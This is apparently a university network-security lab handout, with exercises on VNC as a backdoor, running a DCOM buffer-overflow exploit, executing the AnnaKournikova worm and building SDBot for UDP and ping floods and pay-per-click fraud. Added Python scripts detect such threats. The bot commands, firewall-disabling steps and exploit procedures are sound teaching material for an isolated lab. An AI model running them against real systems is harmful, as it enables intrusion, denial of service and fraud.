VNC is an application level Trojan backdoor. It allows remote access to a system, and can be used for legitimate remote system administration purposes. However, it can also be exploited by hackers since VNC allows a person to change all configurations that they have permission to change. Typically, the VNC server is installed on the system that is to be remotely administered and the client is installed on the administrator’s system. Therefore, if the server was installed by a user with administrator privileges and is running under that account, an attacker that uses the VNC server would have full access to all functions of the system.

Installing and Using VNC on both Windows Machines

Copy the vnc_x86_win32 folder from the NAS server’s tools/Windows folder to the tools folder on your hard drive.

1. Change into the vnc_x86_win32/winvnc directory and double click the Setup program
2. Click OK on the warning about installation of a previous version.
3. Click Next
4. Click Yes on the License Screen
5. Click Next for the destination location default
6. Click Next for the Program Folder default
7. Click Finish

To run the Windows VNC server:

1. From the Start menu, select All Programs -> VNC -> Run WinVNC (App Mode)
2. Enter a password to be used for VNC connections. Remember this password as it will be required for access to the VNC server by a client. This password prevents other attackers from using the VNC server.
3. Click OK. The server is now waiting on the Windows machine.

Switch to the XP copy. To run the Windows VNC client, simply click on “Run VNCviewer”. You will be prompted for the IP address of the system on which the server is running and the password to access that server. Once you have entered both, you should see a GUI come up with a terminal window.

Installing and Running VNC on the Linux Machine

Switch to the /home/tools directory, where you extracted all the Linux tools, and run the following command:

# tar xvfz vnc-3.3.3r2_x86_linux_2.0.tgz

Go into the VNC directory that is created. You will see that there are five different executable programs. Go ahead and read the README file as this will provide you with explanations about what each of the executables does. For example, to run the VNC client, simply type

# ./vncviewer

When prompted for the machine on which the server is running, type in the Windows machine’s IP address. At the next prompt, type in the password. You should then see a GUI of the Windows machine appear on the Linux system.

To run the VNC server, you will have to copy the VNC executables into the /usr/local/bin directory. This puts them in the Linux path. To do this type

# cp vnc* /usr/local/bin
# cp Xvnc /usr/local/bin

Then simply type

# vncserver

Establish a password for the connection and remember this to connect to the Linux machine. Make sure that after using VNC on the Linux system, you end each VNC process after completion, otherwise the port that it listens on will be incremented when the next VNC process is created.

NOTE: To make sure that you can connect to the VNC server running on the Linux system, you have to modify the iptables to allow connections to TCP port 5901 since this is the port that the VNC server runs on by default. Access to this port is normally blocked off (to check this out, run nmap on the Linux system) by the built in firewall in Redhat. Instructions on how to edit the iptables list are given below. Note that the change you make to the iptables is only temporary and will be lost the next time you reboot the system.

Modifying IP tables:

To allow packets coming in destined for the VNC server, type:

# iptables --insert INPUT --protocol tcp --destination-port 5901 -j ACCEPT

If you still cannot connect from Windows then you might need to enter the exact port you just opened in the firewall. To do this, when you enter the host in VNC viewer, enter host:port, e.g. a.b.c.d:5901

On Windows, you will see another virtual desktop, not the normal user’s desktop and mouse movements. Still, even though you cannot see what the normal user is doing, you have remote control of the Linux system from Windows.

Exercise 11.1: Windows VNC Server

Set up a VNC server on your windows machine and connect to it from your Linux machine using the Linux VNC viewer. Try running a couple of different programs, including the password cracking software. Since you are logged on as an administrator, you should be able to do anything.

Q11.1.1. How would you detect that VNC was installed and/or running on your Windows machine?

Exercise 3.2: Linux VNC Server

Start a VNC server on your Linux machine and try to control it from your Windows machine using Windows VNC viewer. Run several different programs as well as view the password and shadow files.

Q11.1.2. How would you detect that VNC was installed on your Linux machine?

Take a screenshot of the VNC client screen (Linux) and another of the VNC viewer (Windows) accessing the VNC server. Turn these in with your report. (Screenshots P2#3, P2#4)

An easy way to take a screenshot in Linux is to press the Print Screen key. A window will come up asking you for the name of the file. PNG is a standard picture format that can be printed from your Linux lab printer or a Windows computer.

Q11.1.3. What defenses could you use against an attack like VNC?
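Q9.1.6, Q11.1.1 and Q11.1.2 all ask how you would notice a Netcat backdoor or a VNC server on a machine you administer. The following script is an added example, not part of the original lab handout or of the Netcat or VNC projects: it parses a listening-socket snapshot (the Windows netstat -ano layout, where the last column is a PID resolved through a tasklist map, and the Linux netstat -tlnp layout, where the last column is PID/program) and flags listeners whose process name is a Netcat binary or a VNC server, or whose port falls in the VNC default range. All sample netstat lines, PIDs and process names are constructed for the example.

```python
import re

# Constructed sample, not captured from the lab machines: three lines in the
# Windows "netstat -ano" layout (owner column is a bare PID) followed by two in the
# Linux "netstat -tlnp" layout (owner column is "PID/program").
SAMPLE_NETSTAT = """
Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       948
  TCP    0.0.0.0:5900           0.0.0.0:0              LISTENING       1612
  TCP    0.0.0.0:56789          0.0.0.0:0              LISTENING       2044
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      731/sshd
tcp        0      0 0.0.0.0:5901            0.0.0.0:*               LISTEN      2211/Xvnc
"""

# Constructed PID -> image name map, as "tasklist" would report on the Windows host.
SAMPLE_TASKLIST = {948: "svchost.exe", 1612: "winvnc.exe", 2044: "nc.exe"}

# One pattern covers both layouts: optional Recv-Q/Send-Q counters, local
# address:port, foreign address, LISTEN or LISTENING, then the owner column.
LISTEN_RE = re.compile(
    r"^\s*tcp6?\s+(?:\d+\s+\d+\s+)?(?P<addr>\S+):(?P<port>\d+)\s+\S+\s+"
    r"LISTEN(?:ING)?\s+(?P<owner>\S+)\s*$",
    re.IGNORECASE,
)

NETCAT_NAMES = {"nc", "nc.exe", "netcat", "netcat.exe", "ncat", "ncat.exe"}
VNC_NAMES = {"winvnc.exe", "xvnc", "vncserver"}


def parse_listeners(netstat_text, pid_to_image):
    """Return (port, pid, image) for every TCP listener in the netstat text."""
    listeners = []
    for line in netstat_text.splitlines():
        m = LISTEN_RE.match(line)
        if not m:
            continue
        owner = m.group("owner")
        if "/" in owner:                       # Linux: "2211/Xvnc"
            pid_str, image = owner.split("/", 1)
        else:                                  # Windows: bare PID, resolved via tasklist
            pid_str, image = owner, pid_to_image.get(int(owner), "unknown")
        listeners.append((int(m.group("port")), int(pid_str), image))
    return listeners


def flag_remote_access(listeners):
    """Attach a reason to every listener that looks like a Netcat shell or a VNC server."""
    findings = []
    for port, pid, image in listeners:
        reasons = []
        name = image.lower()
        if name in NETCAT_NAMES:
            reasons.append("netcat listener (possible cmd.exe backdoor)")
        if name in VNC_NAMES:
            reasons.append("VNC server process")
        if 5800 <= port <= 5999:
            reasons.append("port in VNC default range (5800/5900 plus display number)")
        if reasons:
            findings.append({"port": port, "pid": pid, "image": image, "reasons": reasons})
    return findings


def scan(netstat_text=SAMPLE_NETSTAT, pid_to_image=SAMPLE_TASKLIST):
    """Run both steps on one snapshot; the default arguments use the constructed sample."""
    return flag_remote_access(parse_listeners(netstat_text, pid_to_image))


if __name__ == "__main__":
    for f in scan():
        print(f"port {f['port']:>5}  pid {f['pid']:>5}  {f['image']:<12} "
              + "; ".join(f["reasons"]))
```

On the constructed sample this reports winvnc.exe on 5900, nc.exe on 56789 and Xvnc on 5901, while svchost.exe on 135 and sshd on 22 pass. The process-name checks are the weakest part: an attacker who renames nc.exe defeats them, which is why the script also keys on the port range and why, in practice, you compare the listener list against a known-good baseline taken before the machine was exposed, rather than against a list of bad names.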

Go ahead and close all your VNC client windows and stop the VNC server.

Appendix E: DCOM Exploit (excerpt from lab 6)

Section IV – A Contemporary Vulnerability

Buffer overflow vulnerabilities are extremely common in modern computing. In this final section, we will observe a vulnerability that exists in Windows 2000 Service Packs 0-4 and Windows XP Service Packs 0-1. The vulnerability was eventually patched in August 2003.

The vulnerability is in the Windows DCOM RPC service, which runs automatically with Administrator privileges on both TCP and UDP port 135. The service is designed to allow computers to request services from each other; however, it does no size checking on the input buffer.

Connect to Network Attached Storage, and copy the file Lab6/dcom.c to your Red Hat 7.2 machine. Compile dcom with:

gcc -o dcom dcom.c

Now run

./dcom

to see your command line options.

Your target will be your Windows XP Machine. It is currently not running any service packs (SP0).

Run the exploit, and if you receive a command prompt execute several commands such as dir and cd. Copy your results to a text file and include it with your report.

After you exit, this exploit will cause Windows XP to crash.

16) Take a screenshot of your crashing system and include it with your report.

(Note: depending on the status of your Windows XP system, it is possible that this vulnerability will cause XP to crash immediately. If so, allow it to reboot and try again).

For a very long time, this exploit could be used to install a backdoor and/or crash any Windows 2000 or Windows XP machine remotely.

17) What steps could a system administrator take to prevent this problem?

Appendix F: AnnaKournikova (Excerpt from lab 8)

Section 2: A real world worm, AnnaKournikova

We have already given you some background information on this worm, now it is time to analyze it to see how it works. Run the copy of the Windows XP virtual machine you have created in a previous lab. You should have acquired the file AnnaKournikova.jpg.vbs.txt (actual VBScript file) from the lab8 folder on the NAS machine and placed it in a desktop folder called “anna.” We have supplied you with the Source code in Appendix C. Once you have acquired these files, make sure that your network cable is still unplugged.

First, let us analyze the source code of this worm. Look at Appendix C. This code can be appreciated even by someone who is not familiar with the VBScript language. The subject line and the body of the e-mail should also be clearly identifiable, and with a little work you will be able to see what is going on. Note that at the end it writes something to “HKCU\software\OnTheFly”.

Q2.1: How does the function doMail() help in spreading the virus?

Q2.2: Other than spreading, what is the purpose of this virus?

Q2.3: On what day will this happen?

Q2.4: How can you help prevent the spreading of this virus?

Now that we have a good feel on how the worm works, let us now run the VBScript file. Take off the “txt” extension from the file AnnaKournikova.jpg.vbs.txt file so that Windows now recognizes it as an executable file instead of a text file. This can be done by opening up a cmd prompt in windows and typing:

# cd Desktop
# cd anna
# rename AnnaKournikova.jpg.vbs.txt AnnaKournikova.jpg.vbs

Now go to your “anna” folder and double click on the file.

Now run the Windows Task Manager by pressing the key combination Ctrl-Alt-Delete. Click on the Processes tab and you should see a window like in Figure 1.

Figure 1. Processes outlined in Windows Task Manager.

Don’t you find the fact that CPU Usage is near 100% a little strange for an idle machine? If you look at the processes listed, you will find an executable using most of the CPU resources (in the case of Figure 1, it is wscript.exe). By ending this process, you should notice, in the Performance tab, that the CPU usage should drop down to what is normally expected of an idle machine.

Go ahead and run the VBScript file again, and you should notice the CPU Usage again jump back up to nearly 100%. This type of system performance anomaly is one way to detect whether a worm is trying to execute its code. Now make sure you end the worm process before you proceed further.

Now let us research what files and registry entries are associated with the worm. Go to this website: http://www.ciac.org/ciac/bulletins/l-046.shtml

This site contains information and the history of the AnnaKournikova worm. Notice that some of the information presented is the same as what we deduced from the source code. There are many other database sites that you can find to help research on removing various virus/worms, but we found this site to be the most useful in learning the worm’s effects.

Q2.5: What is one way in which anti-virus programs detect worms and viruses? Give an example (hint: look at the source code for the AnnaKournikova script)
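To make the two detection styles behind Q2.5 concrete, here is an added example that is not part of the original lab and does not contain the worm's source code. It scans a script for an exact signature (the OnTheFly registry key the lab says the worm writes) and for broader heuristics shared by VBS mass-mailers (Outlook automation, registry writes, a picture-then-script double extension). The two sample scripts are constructed for the example and only carry the indicators; the indicator names are my own.

```python
import re

# Constructed stand-in for a suspicious script. It is NOT the worm's source code;
# it only carries the indicators the lab text points at (the OnTheFly registry
# marker and a mailing routine).
SUSPECT_NAME = "AnnaKournikova.jpg.vbs"
SUSPECT_BODY = """
Set sh = CreateObject("WScript.Shell")
sh.RegWrite "HKCU\\software\\OnTheFly\\mailed", 1
Sub doMail()
    Set ol = CreateObject("Outlook.Application")
End Sub
"""

# Constructed benign script for comparison.
BENIGN_NAME = "cleanup.vbs"
BENIGN_BODY = """
Set fso = CreateObject("Scripting.FileSystemObject")
fso.DeleteFile "C:\\temp\\old.log"
"""

# Exact signature: the registry key the lab says the worm writes. Precise, but a
# variant that renames the key is missed.
SIGNATURES = {"anna_onthefly_marker": re.compile(r"OnTheFly", re.IGNORECASE)}

# Heuristics: behaviour shared by the whole family of VBS mass-mailers. Broader,
# but a legitimate admin script can trip them.
HEURISTICS = {
    "outlook_automation": re.compile(
        r'CreateObject\s*\(\s*"Outlook\.Application"\s*\)', re.IGNORECASE),
    "registry_write": re.compile(r"\.RegWrite\s", re.IGNORECASE),
}
# A picture/document extension followed by a script extension: the trick that makes
# AnnaKournikova.jpg.vbs look like a JPEG to a user who has extensions hidden.
DOUBLE_EXT = re.compile(r"\.(jpe?g|gif|png|txt|doc)\.(vbs|vbe|js|wsf|exe|scr)$", re.IGNORECASE)


def scan_script(filename, body):
    """Classify one file: which signature matched and which heuristics fired."""
    hits = {"signatures": [], "heuristics": []}
    for name, rx in SIGNATURES.items():
        if rx.search(body):
            hits["signatures"].append(name)
    for name, rx in HEURISTICS.items():
        if rx.search(body):
            hits["heuristics"].append(name)
    if DOUBLE_EXT.search(filename):
        hits["heuristics"].append("double_extension")
    if hits["signatures"]:
        hits["verdict"] = "known_worm"
    elif hits["heuristics"]:
        hits["verdict"] = "suspicious"
    else:
        hits["verdict"] = "clean"
    return hits


if __name__ == "__main__":
    for name, body in ((SUSPECT_NAME, SUSPECT_BODY), (BENIGN_NAME, BENIGN_BODY)):
        print(name, scan_script(name, body))
```

The signature gives a definite identification but only for this exact worm; a copy with the registry key renamed is downgraded to "suspicious" on the heuristics alone. That trade-off, precise-but-brittle strings versus broad-but-noisy behaviour checks, is the same one a real anti-virus engine makes.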

Now let us manually remove the AnnaKournikova worm by going to the “Removal” section on the website. Basically, removal of the worm requires that we kill the running worm, remove copies of the AnnaKournikova.jpg.vbs file from the C:\WINDOWS directory we put it in, and remove the registry entry.

First, let us remove the registry entry. Click on the Start button and select Run. Then type regedit to open the registry editor. Now search for the term OnTheFly since that is where the worm made its registry entry. (You should remember this fact from viewing the source code and reading the information on the website.) The registry editor should find the OnTheFly folder just like in Figure 2.

Figure 2. Worm’s Registry Entry “OnTheFly”

Now let us delete this entry by right-clicking on the OnTheFly folder and selecting delete. The entry should be removed. Now let us remove the AnnaKournikova.jpg.vbs file from the C:\WINDOWS directory and the Desktop folder we created. Now reboot the WindowsXP virtual machine. The worm should be ineffective now. With this exercise, it is our hope that you learn how a real world worm can operate, where it can hide, and how to remove it by consulting sources.

Appendix G: SDBot (Excerpt from lab 10)

Section 2: SDBot

The first bot you will work with is SDBot, which is written in C and uses IRC to communicate with the bot master. It is neither the most powerful bot nor the most popular, but the setup is straightforward, and the version of the code we have has the self-replicating routines removed, so it is easier to control.

2.1 Installation and Configuration

Copy the SDBot folder from the NAS to your Windows XP virtual machine. Because SDBot is a C program, we have to install a windows C compiler. In the SDBot folder run the file lccwin32.exe to install the compiler. Click through the install process, leaving all of the default options in place.

Once LCC is installed, open the sdbot05b.c file in Wordpad and scroll down to the section labeled “bot configuration.” Make the following changes to the listed variables:

1. botid[] = “f00f00” → botid[] = “bot1”
2. password[] = “bar” → password[] = “password”
3. server[] = “irc.dal.net” → server[] = “ircserver”
4. port = 6667 → port = 6668
5. channel[] = “#foobar” → channel[] = “#ece4112”
6. filename[] = “syscfg32-bot.exe” → filename[] = “4112SDbot.exe”

This sets up the bot to connect to the IRC server we set up on the WS 4.0 host machine. Save the file as 4112bot.c and exit Wordpad.

Now, browse to C:\windows\system32\drivers\etc and edit the hosts file in Notepad to include the line:

<WS 4.0 IP> ircserver

Save the file.

Now run the make-lcc-4112.bat file to create a 4112bot.exe executable. This is the executable that you would need to get onto a victim machine and launch to make it part of your botnet. How to get the .exe onto a victim machine is beyond the scope of this lab, but recall techniques learned in previous labs.

Once the SDbot is installed, all firewall software will need to be disabled so that it won’t interfere with our experiments. Open the task manager, click the Processes tab, and end the blackice.exe and blackd.exe processes. This will need to be done after every reboot.

Also ensure that the windows firewall is disabled by navigating to the control panel and clicking on the Network Connections icon. Then right click the active connection icon, select Properties, click the Advanced tab, and ensure that the Windows firewall is turned off.

2.2 Meet Your Bot

Run the 4112bot.exe executable on the XP virtual machine. Go back onto your host machine and watch the X-Chat window. Within a few minutes a host with random letters for a username should log into your channel; this is your bot. Log into your bot by typing:

.login password (bot responds: password accepted)

In the X-Chat window now type:

.si

The bot should respond with some information about the system it is running on.

Screenshot #1: Take a screenshot of the X-Chat window showing successful login and system information printout.

Now type:

.repeat 6 .delay 1 .execute 1 winmine.exe

Q2.1. What is the result of this command?

The file sdbot_commandref.html is a list of commands that you can execute using SDBot. We’ll take a look at a few of them now.
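Because SDBot talks plain, unencrypted IRC (port 6668 in this lab), everything the bot master types in X-Chat, and every reply the bot sends, is visible to a sniffer on the network. The following is an added example, not part of the original lab or of SDBot itself: it reads raw IRC PRIVMSG lines, flags messages whose text consists of the dot-commands this lab issues (.login, .si, .repeat/.delay/.execute in 2.2, .visit in 2.5), and records which nick replied "password accepted", as the bot does. The IRC lines, nicks and hosts are constructed; the command set is the one shown in the lab and would be extended from sdbot_commandref.html.

```python
import re

# Constructed IRC traffic, as a sniffer on the lab network would see it in the clear
# (the lab's bot talks plain IRC on TCP 6668). Nicks, hosts and the pay-per-click
# destination URL are made up; the dot-commands are the ones the lab itself issues.
SAMPLE_IRC = [
    ":master!gt@10.0.0.5 PRIVMSG #ece4112 :hello everyone",
    ":master!gt@10.0.0.5 PRIVMSG #ece4112 :.login password",
    ":xqzvtrlp!xqzvtrlp@10.0.0.20 PRIVMSG #ece4112 :password accepted.",
    ":master!gt@10.0.0.5 PRIVMSG #ece4112 :.si",
    ":master!gt@10.0.0.5 PRIVMSG #ece4112 :.repeat 6 .delay 1 .execute 1 winmine.exe",
    ":master!gt@10.0.0.5 PRIVMSG #ece4112 :.visit http://57.35.6.10/index.html http://example.com",
    ":alice!a@10.0.0.7 PRIVMSG #ece4112 :I think .net is nice",
]

# Dot-commands shown in this lab. Extend from sdbot_commandref.html for full coverage.
BOT_COMMANDS = {"login", "si", "repeat", "delay", "execute", "visit"}

PRIVMSG_RE = re.compile(
    r"^:(?P<nick>[^!\s]+)(?:!\S+)?\s+PRIVMSG\s+(?P<target>\S+)\s+:(?P<text>.*)$")
# A dot-command is a '.' at the start of the text or after whitespace, so URLs such
# as http://57.35.6.10/index.html are not mistaken for commands.
CMD_RE = re.compile(r"(?:^|\s)\.(?P<cmd>[a-z]+)\b")


def analyze_irc(lines):
    """Pick out controller commands and bot acknowledgements from raw IRC lines."""
    alerts, controllers, bots = [], set(), set()
    for line in lines:
        m = PRIVMSG_RE.match(line)
        if not m:
            continue
        nick, target, text = m.group("nick", "target", "text")
        if text.startswith("."):
            cmds = [c for c in CMD_RE.findall(text) if c in BOT_COMMANDS]
            if cmds:
                controllers.add(nick)
                alerts.append({"nick": nick, "channel": target, "commands": cmds, "text": text})
        elif re.search(r"\bpassword accepted\b", text, re.IGNORECASE):
            bots.add(nick)          # the ".login" reply the lab shows
    return {"alerts": alerts, "controllers": sorted(controllers), "bots": sorted(bots)}


if __name__ == "__main__":
    result = analyze_irc(SAMPLE_IRC)
    for a in result["alerts"]:
        print(f"{a['nick']} -> {a['channel']}: {a['commands']}")
    print("controllers:", result["controllers"], "bots:", result["bots"])
```

On the sample this yields four command alerts from "master", identifies "xqzvtrlp" as the bot from its login reply, and ignores the ordinary chat lines. The same matching logic is what an IDS signature for IRC-based bots does; the defender's caveat is that it depends on the channel being cleartext and on knowing the command vocabulary, so a bot on a non-standard port with obfuscated commands needs the behavioural evidence the lab also shows (the unexpected process, the registry entries, the traffic volume in Ethereal).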

2.3 UDP Flood

We will now use our bot to execute a UDP flood attack against your RedHat 7.2 machine (make sure to boot it up).

1. Open up ethereal on the host machine and filter the packets with these expressions: ((ip.src==<XP ip>) && (ip.dst==< RH7.2 ip>) && udp)

2. Click on the Capture tab and click on Options.

3. Check "real time" and "automatic scrolling" under display options and start Capture.
4. Use the command reference page to find the command for a UDP flood. Use the command to send 1000 4096-byte packets to port 23 of the RedHat 7.2 machine. Use a 1 ms delay.
6. Wait until the bot displays "finished sending packets to < RH7.2 ip>".
7. Stop Ethereal.
8. Click on the Statistics tab on the Ethereal menu bar
9. Click on “Summary”
10. Check the Avg MBit/s traffic displayed

Q2.2. What command did you use?

Q2.3. What happens if you don’t specify the port number to use for the UDP flood?

Q2.4. How many bots would be needed to flood a 1 Gbit link with UDP packets?

Q2.5: How might this attack be prevented from the perspective of the flood target? From the perspective of the infected victim?

2.4 Ping Flood

Now we’ll use the bot to execute a PING flood attack against the same target.

1. Open up ethereal and filter the packets with these expressions: ((ip.src==<XP ip>) && (ip.dst==< RH7.2 ip>) && icmp)

2. Click on the Capture tab and click on Options.
3. Make sure "real time" and "automatic scrolling" under display options are checked and start Capture.
4. Use the command reference to find the command for a PING flood. Use 1000 packets of size 4096, sent to the RedHat 7.2 machine. Use a 1 ms delay.
6. Wait until the bot displays "finished sending packets to < WS4.0 ip>".
7. Stop Ethereal.
8. Click on the Statistics tab on the Ethereal menu bar
9. Click on “Summary”
10. Check the Avg MBit/s traffic displayed

Q2.6. What command did you use?

Q2.7. How many bots would be needed to flood a 1 Gbit link with ICMP packets?

Q2.8. From the result of the two floods, which one is more efficient: UDP or ICMP flood?

Q2.9. Based on your answer to question 2.7, when would you not use the more efficient one?

2.5 Fraudulent Pay-per-click Count

Another use that botnets have been put to is to generate a fraudulent number of webpage referrals in pay-per-click advertising schemes. This is how it works: An advertising agency puts up a “banner” on an individual’s webpage, and pays the individual a nominal amount every time a visitor to the webpage clicks on the banner (which is a link to the sponsor’s website). Botnets can be used to generate large numbers of false “clicks” on these banners, thus fraudulently earning the individual a lot of money. This is how this is accomplished:

1. Open up ethereal and filter the packets with these expressions: ( ((ip.src==<WinXP IP>) && (ip.dst==57.35.6.10) && tcp) || (ip.src==57.35.6.10 && (ip.dst==< WinXP IP >) && tcp) )
2. Click on the Capture tab and click on Options.
3. Make sure "real time" and "automatic scrolling" under display options are checked and start Capture.
4. SDbot command for fraudulent pay-per-click: .visit http://57.35.6.10/index.html http://<yourWebSite>.com
6. Wait until the bot displays “url visited.”
7. Stop Ethereal.
8. Now examine any tcp packet by right-clicking and selecting “Follow TCP stream.”

Screenshot #2: Take a screenshot of the tcp stream showing the source and referrer web page.

2.6 Bot Removal

Open up the Task Manager (Ctrl+Alt+Del) and you should see the bot running under the conspicuous process name 4112SDBot.exe; if you were trying to hide the bot, you would, of course, pick a much less obvious name. Use the Task Manager to kill the process and restart your virtual machine. Once it has rebooted open up Task Manager again. Your bot should still be running. This is one of the most powerful things about bots; once you infect a computer, it stays infected (unless the user gets smart and fully deletes it).

1. Use Task Manager to kill the process again.
2. Open the file “sdbot05a.c”
3. Search for the function “void uninstall (void)” and examine its code

From this, you should be able to tell what the names of SDBot’s registry entries are.

Q.2.10. Where are the registry entries? Why are the entries placed in these two locations?

4. Open the registry editor by clicking Start → Run and typing in “regedit”.
5. Delete the registry entries as described by the source code and restart the virtual machine.
6. Verify that sdbot05a.exe and TEMP.exe no longer show up as processes in Windows Task Manager.

Q.2.11. How would a user know where in their registry the bot is located if the source code were not available for inspection?

Sources:

General information: http://en.wikipedia.org/wiki/Sandbox_(computer_security), www.wilderssecurity.com/
Sandboxie: www.sandboxie.com
ShadowSurfer: www.storagecraft.com/products/ShadowSurfer/
Virtual Sandbox: www.fortresgrand.com/products/vsb/vsb.htm
JPEGofDeath exploit test: http://www.guidoz.com/exploit-test.exe

ECE 4112 Internetwork Security

Lab X: Sandboxing

Group Number: _________

Member Names: ___________________ _______________________

Section 1: Installing the Sandboxes and testing

Q1.1: What did you notice about each sandbox after the restart?

Q1.2: Do you see the file on your desktop?

Screenshot #1-3: Take a screenshot in each VM with the IE window with the copied file name highlighted and the file on the desktop in the same screenshot.

Q1.3: For each VM, do you see the file on your desktop?

Q1.4: Upon bootup, for each of the computers, is the FTP’d file still there?

Q1.5: What happens with each of the three sandboxes when you try to close the sandbox?

Q1.6: Upon bootup, for each of the computers, is the text file still there?

Section 2: Susceptibility to Remote Attacks and Local Attacks

Q2.1: Since a sandbox is supposed to mimic an actual host, should it allow crashes if the host crashes?

Q2.2: For each of the VMs, did you crash?

Q2.3: For each of the VMs, did you crash?

Section 3: Susceptibility to Rootkits, Backdoors, Worms, Botnets

Q3.8: For each of the VMs, did all of them load the worm correctly? Why or why not?

Screenshot #4-6: Take a screenshot showing this registry entry

Q3.9: Is this registry key there? Why or why not?

Q3.10: Did SDBot load up successfully on each VM? If not, why?

Section 4: Clearing the Sandbox

Q4.1: After the restart, did you notice any of the programs we used in section 3 load up? If so, what programs are active?

Screenshot # 7-9: Take a screenshot of the OnTheFly registry key, or where it would be

Q4.2: What sandbox do you prefer? Why?

General Questions

How long did it take you to complete this lab? Was it an appropriate length lab?

Suggested Additions and Future Enhancements

What corrections and/or improvements do you suggest for this lab? Please be very specific and if you add new material give the exact wording and instructions you would give to future students in the new lab handout. You may cross out and edit the text of the lab on previous pages to make minor corrections/suggestions. General suggestions like "add tool xyz to do more capable scanning" will not be awarded extra points even if the statement is totally true. Specific text that could be cut and pasted into this lab, completed exercises, and completed solutions may be awarded additional credit. Thus if tool xyz adds a capability or an additional or better learning experience for future students, here is what you need to do. You should add that tool to the lab by writing new detailed lab instructions on where to get the tool, how to install it, how to run it, what exactly to do with it in our lab, example outputs, etc. You must prove with what you turn in that you actually did the lab improvement yourself. Screen shots and output hardcopy are a good way to demonstrate that you actually completed your suggested enhancements. The lab addition section must start with the title “Lab Addition”, your addition subject title, and must start with a paragraph explaining at a high level what new concept may be learned by adding this to the existing laboratory assignment. After this introductory paragraph, add the details of your lab addition. Include the lab addition cover sheet from the class web site.

Turn-in Checklist

Answer Sheet with answers.
9 Screenshots
Any additions for the lab.
